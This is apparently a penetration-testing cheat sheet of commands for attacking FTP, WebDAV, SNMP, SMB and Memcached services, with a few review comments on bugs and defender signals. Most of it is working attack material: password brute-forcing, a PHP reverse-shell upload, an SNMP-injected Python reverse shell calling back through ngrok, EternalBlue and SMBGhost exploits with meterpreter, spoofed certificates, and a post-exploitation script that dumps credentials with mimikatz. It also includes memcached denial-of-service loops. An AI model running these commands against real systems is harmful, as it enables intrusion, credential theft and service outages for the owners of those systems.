Network Configuration
Check List
Cheat Sheet
FTP
Identify FTP
nmap -p 21 -sS -sV --mtu 5000 --script banner $WEBSITE
Anonymous Login
nmap -p 21 -sS -sV --mtu 5000 --script ftp-anon $WEBSITE
Brute Force
nmap -p 21 -sS -sV --mtu 5000 --script ftp-brute $WEBSITE
Browser Login
ftp://anonymous:anonymous@$TARGET
Download Files
wget --ftp-user=anonymous --ftp-password=anonymous ftp://$TARGET:21
CLI Login
ftp
open $TARGET 21
USER
> anonymous
PASS
> anonymous
FTP Mode
passive
Download File
get file.txt
Brute Force
hydra -V \
-L /usr/share/seclists/Usernames/sap-default-usernames.txt \
-P /usr/share/seclists/Passwords/darkweb2017-top10000.txt ftp://$TARGET:21
Recon Version
msfconsole -qx "
use auxiliary/scanner/ftp/ftp_version;
set RHOSTS $WEBSITE;
run;
exit"
Anonymous Login
msfconsole -qx "
use auxiliary/scanner/ftp/anonymous;
set RHOSTS $WEBSITE;
run;
exit"
Brute Force
msfconsole -qx "
use auxiliary/scanner/ftp/ftp_login;
set RHOSTS $WEBSITE;
set USERPASS_FILE /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt;
run;
exit"
WebDAV
Identify WebDAV
nmap -p 80,443 \
-sS -sV --mtu 5000 \
--script http-methods,http-webdav-scan $WEBSITE
Scan WebDAV
# NOTE(review): unlike every other msfconsole snippet on this page there is no `run;`
# before `exit`, so the module is loaded and configured here but never executed.
msfconsole -qx "
use auxiliary/scanner/http/webdav_scanner;
set PATH /webdav;
set RHOSTS $WEBSITE;
exit"
Brute Force
hydra -V \
-L /usr/share/seclists/Usernames/sap-default-usernames.txt \
-P /usr/share/seclists/Passwords/darkweb2017-top10000.txt \
$TARGET http-get /webdav/
Scan WebDAV
davtest -url $WEBSITE
Upload Shell
davtest -url $WEBSITE \
-uploadfile /usr/share/webshells/php/php-reverse-shell.php \
-uploadloc shell.php
Listening
nc -lvnp 1234
cadaver $WEBSITE/webdav
PUT Web shell
put /usr/share/webshells/php/php-reverse-shell.php
Listening
nc -lvnp 1234
SNMP
Identify SNMP
nmap -p 161 -sU -sV --mtu 5000 --script snmp-info $WEBSITE
Brute Force
nmap -p 161 -sU -sV --mtu 5000 --script snmp-brute $WEBSITE
Enumerate SNMP Public
snmpwalk -v1 -c public $TARGET
Scan SNMP Community Strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $TARGET
SNMPv1
# "OID" is a placeholder for the writable object identifier (the v2c form below uses
# sysName.0). A successful write means the community string grants read-write access,
# which on its own is a finding a defender should record and remediate.
snmpset -v1 -c private $TARGET OID s "unk9vvn"
SNMPv2
snmpset -v2c -c private $TARGET sysName.0 s "unk9vvn"
Start Ngrok
ngrok http 4444 >/dev/null 2>&1 &
Define ENV Ngrok
# Takes the first tunnel ngrok reports and strips only an "https://" prefix; if that
# tunnel's public_url is http:// the prefix is kept and $NGHOST is not a bare hostname.
NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')
Inject RCE
# Relies on NET-SNMP-EXTEND-MIB rows being creatable via snmpset, which presumably
# requires the community given with -c to have write access and the extend MIB to be
# enabled on the agent. From the defender's side the signals are a read-write community
# reachable over the network and new nsExtend* objects appearing in SNMP traffic;
# read-only communities or SNMPv3 with authentication close this off.
snmpset -m +NET-SNMP-EXTEND-MIB \
-v 2c \
-c SuP3RPrivCom90 $TARGET 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"$NGHOST\",443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
Execute Command
snmpwalk -v2c -c SuP3RPrivCom90 $TARGET NET-SNMP-EXTEND-MIB::nsExtendObjects
Enumerate SNMP Public
msfconsole -qx "
use auxiliary/scanner/snmp/snmp_enum;
set RHOSTS $WEBSITE;
run;
exit"
Enumerate SNMP Private
msfconsole -qx "
use auxiliary/scanner/snmp/snmp_enum;
set RHOSTS $WEBSITE;
set COMMUNITY private;
run;
exit"
Enumerate Windows Users
msfconsole -qx "
use auxiliary/scanner/snmp/snmp_enumusers;
set RHOSTS $WEBSITE;
run;
exit"
Enumerate File Shares
msfconsole -qx "
use auxiliary/scanner/snmp/snmp_enumshares;
set RHOSTS $WEBSITE;
run;
exit"
SMB
Identify SMB
nmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-protocols,smb-os-discovery,smb2-capabilities $WEBSITE
Recon Vulns
nmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-vuln-*,smb-double-pulsar-backdoor $WEBSITE
Brute Force
nmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-brute $WEBSITE
Enumerate Users and Shares
nmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-enum-users,smb-enum-shares $WEBSITE
Enumerate Domains and Groups
nmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-enum-domains,smb-enum-groups $WEBSITE
Enumerate Services and Processes
nmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-enum-services,smb-enum-processes $WEBSITE
Enum Host
netexec smb $TARGET
Enumerate Shares
enum4linux -a $TARGET
Scan NetBIOS Names
nbtscan -r $TARGET/24
User Enumeration and Null Sessions
smbclient -N -L //$TARGET
User Enumeration and Null Sessions
rpcclient -U "" $TARGET
Detect Version
msfconsole -qx "
use auxiliary/scanner/smb/smb_version;
set RHOSTS $TARGET;
run;
exit"
Enumerate Users
msfconsole -qx "
use auxiliary/scanner/smb/smb_enumusers;
set RHOSTS $TARGET;
run;
exit"
Enumerate Shares
msfconsole -qx "
use auxiliary/scanner/smb/smb_enumshares;
set RHOSTS $TARGET;
run;
exit"
Credential Dumps
msfconsole -qx "
use auxiliary/scanner/smb/impacket/secretsdump;
set RHOSTS $TARGET;
run;
exit"
Credential Brute Force
msfconsole -qx "
use auxiliary/scanner/smb/smb_login;
set RHOSTS $TARGET;
set SMBUser Administrator;
set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top100.txt;
run;
exit"
Detect EternalBlue
msfconsole -qx "
use auxiliary/scanner/smb/smb_ms17_010;
set RHOSTS $TARGET;
run;
exit"
Start Ngrok
ngrok http 4444 >/dev/null 2>&1 &
Define ENV Ngrok
# Takes the first tunnel ngrok reports and strips only an "https://" prefix; if that
# tunnel's public_url is http:// the prefix is kept and $NGHOST is not a bare hostname.
NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')
Cert Spoof
# Destructive: removes every file under the msf loot directory, not only certificates,
# so that the find in the CERT line further down sees just what this run writes.
# Assumes the home directory is /home/$USER; $HOME would be the portable form.
rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
use auxiliary/gather/impersonate_ssl;
set RHOSTS google.com;
run;
exit"
Define ENV Cert
# If no *.pem exists the command substitution is empty and CERT becomes the loot
# directory path itself, which is not a usable value for the HandlerSSLCert options below.
CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)
Post-EXP
cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF
EternalBlue Exploit (Win 7 to 10 - Win Server 2008 to 2012)
msfconsole -qx "
use exploit/windows/smb/ms17_010_eternalblue;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
Doublepulsar Exploit (Win 7 to 10 - Win Server 2008 to 2012)
msfconsole -qx "
use exploit/windows/smb/smb_doublepulsar_rce;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
SMBGhost Exploit (Win 10)
msfconsole -qx "
use exploit/windows/smb/cve_2020_0796_smbghost;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
Net API Exploit (Windows XP)
msfconsole -qx "
use exploit/windows/smb/ms08_067_netapi;
set PAYLOAD windows/meterpreter/reverse_hop_http;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
Memcached
Identify Memcached
nmap -p 11211 -sS -sV --mtu 5000 --script memcached-info $WEBSITE
Get Version
echo "version" | nc -vn -w 1 $TARGET 11211
Get Status
echo "stats" | nc -vn -w 1 $TARGET 11211
Get Slabs
echo "stats slabs" | nc -vn -w 1 $TARGET 11211
Get Items
echo "stats items" | nc -vn -w 1 $TARGET 11211
Get Key Names
echo "stats cachedump 1 10" | nc -vn -w 1 $TARGET 11211
Get Info Saved
echo "get $ITEM" | nc -vn -w 1 $TARGET 11211
Denial of Service
# NOTE(review): the other nc invocations on this page pass -w 1; without a timeout here
# each iteration may block until the server closes the connection, depending on the nc
# variant. On the defender's side this is a burst of short-lived TCP connections from one
# source to 11211 carrying repeated "set" commands with a 1024-byte value — a
# straightforward rate-limit / alert condition.
for i in {1..10000}; do echo "set key$i 0 0 1024" | nc $TARGET 11211; done
DDoS Amplification
# The leading 8 bytes are the memcached UDP frame header placed in front of the ASCII
# "stats" command. -q is a Debian/GNU netcat option; OpenBSD nc does not accept it.
# Server-side mitigation is to disable the UDP listener (memcached -U 0) or not expose
# 11211 beyond the local network at all.
echo -e "\x00\x00\x00\x00\x00\x01\x00\x00stats\n" | nc -u -q 1 $TARGET 11211
Get Stats
memcstat --servers=$TARGET
Get All Items
memcdump --servers=$TARGET
Get Item Contents
memccat --servers=$TARGET $ITEM1 $ITEM2 $ITEM3
Extract Slabs
msfconsole -qx "use auxiliary/gather/memcached_extractor;set RHOSTS $TARGET;run;exit"
Denial of Service
msfconsole -qx "use auxiliary/dos/misc/memcached;set RHOSTS $TARGET;run;exit"